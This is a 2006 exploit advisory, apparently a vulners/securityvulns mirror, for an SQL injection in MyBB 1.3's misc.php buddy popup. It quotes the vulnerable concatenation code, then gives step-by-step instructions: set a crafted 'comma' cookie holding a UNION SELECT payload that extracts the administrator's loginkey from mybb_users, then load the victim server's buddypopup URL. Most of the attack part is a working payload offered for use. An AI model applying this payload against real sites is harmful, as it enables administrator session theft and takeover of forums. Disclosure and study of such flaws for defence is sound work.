Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11640
HistoryMar 01, 2006 - 12:00 a.m.

MyBB 1.3 NewSQL Injection

2006-03-0100:00:00
vulners.com
10

MyBB New SQL Injection

D3vil-0x1 < Devil-00 >

Milw0rm ID :-
http://www.milw0rm.com/auth.php?id=1320

The Inf.File :-
misc.php

Linez :-

[code]
$buddies = $mybb->user['buddylist'];

    $namesarray = explode&#40;&quot;,&quot;,$buddies&#41;;

    if&#40;is_array&#40;$namesarray&#41;&#41;

    {

            while&#40;list&#40;$key, $buddyid&#41; = each&#40;$namesarray&#41;&#41;

            {

                    $sql .= &quot;$comma&#39;$buddyid&#39;&quot;; &lt;== HERE :&#41; Uncleard Var !!

                    $comma = &quot;,&quot;;

            }

    $timecut = time&#40;&#41; - $mybb-&gt;settings[&#39;wolcutoff&#39;];

    $query = $db-&gt;query&#40;&quot;SELECT u.*, g.canusepms FROM &quot;.TABLE_PREFIX.&quot;users u LEFT JOIN

".TABLE_PREFIX."usergroups g ON (g.gid=u.usergroup) WHERE u.uid IN ($sql)");
[/code]

>From 255 to 265

The GLOBALS unset function … do not unset $_COOKIES …
then u can start attacking any var by cookies :)

Tested MyBB 1.3 … Register_Globals = On

Explorer Exploit :-

1- Login by any username …
2- Create new cookie (
name => "comma"
value =>
"comma=0)%20%3C%3E%200%20UNION%20ALL%20SELECT%201,loginkey,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,1
FROM mybb_users WHERE uid=1/*"
)

3- Check The URL :-
HOST/PATH/misc.php?action=buddypopup

Where HOST = The Vic.Server And PATH = MyBB Dir.